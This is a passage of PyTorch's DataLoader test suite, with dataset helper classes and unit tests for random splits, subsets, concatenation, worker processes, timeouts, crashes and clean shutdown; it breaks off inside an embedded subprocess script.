# Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
IterDataPipe,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE,
IS_MACOS)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes into the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
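# A minimal sketch (not called by any test; assumes dill is installed): dill's own
# pickler can round-trip objects such as lambdas that the stdlib pickler rejects.
# The `dill.extend(use_dill=False)` call above keeps that machinery out of the
# stdlib `pickle` module, so the DataLoader tests below see stock pickling behavior.
def _dill_roundtrip_sketch():
    fn = dill.loads(dill.dumps(lambda x: x + 1))  # works only via dill's pickler
    assert fn(1) == 2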
try:
import numpy as np
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
skipIfNoNumpy = unittest.skipIf(not HAS_NUMPY, "no NumPy")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start methods is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context, because some tests / third-party libraries set
# the start method on import, and setting it again raises a `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for inter-process communication can vary greatly. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
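# A minimal sketch of the start-method note above (not exercised by the tests):
# multiprocessing primitives must come from the same context as the processes that
# use them, so both the Event and the Process below come from the single
# module-wide `mp` context fetched at import time. `_set_event` is a hypothetical
# helper kept at module level so it stays picklable under `spawn`.
def _set_event(event):
    event.set()
def _start_method_sketch():
    done = mp.Event()
    p = mp.Process(target=_set_event, args=(done,))
    p.start()
    p.join(JOIN_TIMEOUT)
    return done.is_set()  # True: primitive and process shared one context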
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
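# A minimal standalone sketch (illustrative, not used by the tests) of how
# ConcatDataset resolves a flat index: it keeps cumulative sizes and bisects them
# to find the owning dataset, which is why indexing past the total length raises
# IndexError in test_concat_raises_index_error above.
def _concat_indexing_sketch(datasets, idx):
    import bisect
    cumulative = list(itertools.accumulate(len(d) for d in datasets))
    if not 0 <= idx < cumulative[-1]:
        raise IndexError('index out of range')
    ds_idx = bisect.bisect_right(cumulative, idx)
    local_idx = idx if ds_idx == 0 else idx - cumulative[ds_idx - 1]
    return datasets[ds_idx][local_idx]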
# takes a dummy argument so this can also be used as a `worker_init_fn`
def set_faulthandler_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthandler_if_available()
# Process `pid` must have called `set_faulthandler_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
# Setting disable_stderr=False may generate a lot of unrelated error output,
# but it can be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthandler_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthandler_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill could not find a live process with that pid
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
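# A usage sketch for ErrorTrackingProcess (not called by any test): run a picklable
# module-level callable that raises, then read the reconstructed exception back from
# the `.exception` property. `error_worker_init_fn` (defined further below) is just
# a convenient module-level function that raises a RuntimeError.
def _error_tracking_usage_sketch():
    p = ErrorTrackingProcess(target=error_worker_init_fn, args=(None,))
    p.start()
    p.join(JOIN_TIMEOUT)
    return p.exception  # RuntimeError('Error in worker_init_fn'), or None on success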
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.slept = False
def __getitem__(self, idx):
if not self.slept:
time.sleep(self.sleep_sec)
self.slept = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
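# A usage sketch (not called directly; the iterable-style tests below do the real
# work): with num_workers equal to len(sizes), worker i yields range(sizes[i]), so
# the loader as a whole yields the multiset union of every worker's range.
def _worker_specific_usage_sketch():
    sizes = [0, 4, 20]
    loader = DataLoader(WorkerSpecificIterableDataset(sizes),
                        num_workers=len(sizes), batch_size=None)
    return sorted(loader)  # == sorted(sum((list(range(s)) for s in sizes), []))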
# Inspired by https://stackoverflow.com/a/26703365
# If all workers call `sync_once`, they will be blocked until every worker
# reaches the call (i.e., it acts like a barrier).
# This can be used to ensure that each worker processes at least one item.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
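# A minimal standalone sketch of the single-use barrier that `sync_once` above
# builds from a shared counter plus a semaphore: the last arriving party releases
# the semaphore once, and every woken waiter re-releases it so the remaining
# waiters fall through one after another. (Illustrative only; the tests use
# SynchronizedDataset directly.)
def _barrier_once_sketch(count, barrier, num_parties):
    # count: mp.Value('i', 0, lock=True), barrier: mp.Semaphore(0)
    with count.get_lock():
        count.value += 1
        if count.value == num_parties:
            barrier.release()  # last arrival opens the barrier
    barrier.acquire()          # block until the barrier is open
    barrier.release()          # pass the token on to the next waiter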
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See test_large_sampler_indices below and
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since the worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
devnull = open(os.devnull, 'w')
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthandler_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=_test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# _test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
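# A minimal sketch (hypothetical helper, not used by the tests above) of the common
# pattern those assertions rely on: inside a worker, `get_worker_info()` exposes
# `id`, `num_workers`, `seed`, and this worker's private copy of `dataset`, so a
# `worker_init_fn` may mutate the copy, e.g. to shard an iterable dataset.
def _sharding_init_fn_sketch(worker_id):
    info = torch.utils.data.get_worker_info()
    ds = info.dataset  # per-worker copy; mutating it never touches the main process
    shard = int(math.ceil(len(ds.data) / info.num_workers))  # assumes ds has `.data`
    ds.data = ds.data[worker_id * shard:(worker_id + 1) * shard]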
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
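# A usage sketch of the pair above (not called directly; see
# test_bulk_loading_nobatch below): batch_size=None disables auto-batching, so each
# index list yielded by BulkLoadingSampler reaches BulkLoadingDataset.__getitem__
# whole, and one entire batch is fetched per dataset access.
def _bulk_loading_usage_sketch():
    ds = BulkLoadingDataset(35)
    loader = DataLoader(ds, batch_size=None,
                        sampler=BulkLoadingSampler(ds, batch_size=4))
    return [batch for batch in loader]  # tensors of 4 indices (last may be shorter)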
class TestMultiEpochDataset(IterableDataset):
def __init__(self, length):
self.length = length
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
worker_id = worker_info.id
for idx in range(self.length // worker_info.num_workers):
yield worker_id
def __len__(self):
return self.length
class CustomList(list):
pass
class CustomDict(dict):
pass
def row_processor(row):
return np.add(row, 1)
def filter_len(row):
return len(row) == 4
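# Note on the two helpers above: multiprocessing DataLoader workers receive their
# callables via pickling, and the stdlib pickler serializes functions by qualified
# name, so map/filter callables must live at module scope unless dill is available
# (see test_multiprocessing_iterdatapipe below). A small sketch:
def _picklable_callable_sketch():
    import pickle
    pickle.dumps(row_processor)        # fine: module-level, pickled by reference
    try:
        pickle.dumps(lambda row: row)  # local lambda: stock pickle rejects it
    except (pickle.PicklingError, AttributeError, TypeError):
        return True
    return False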
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
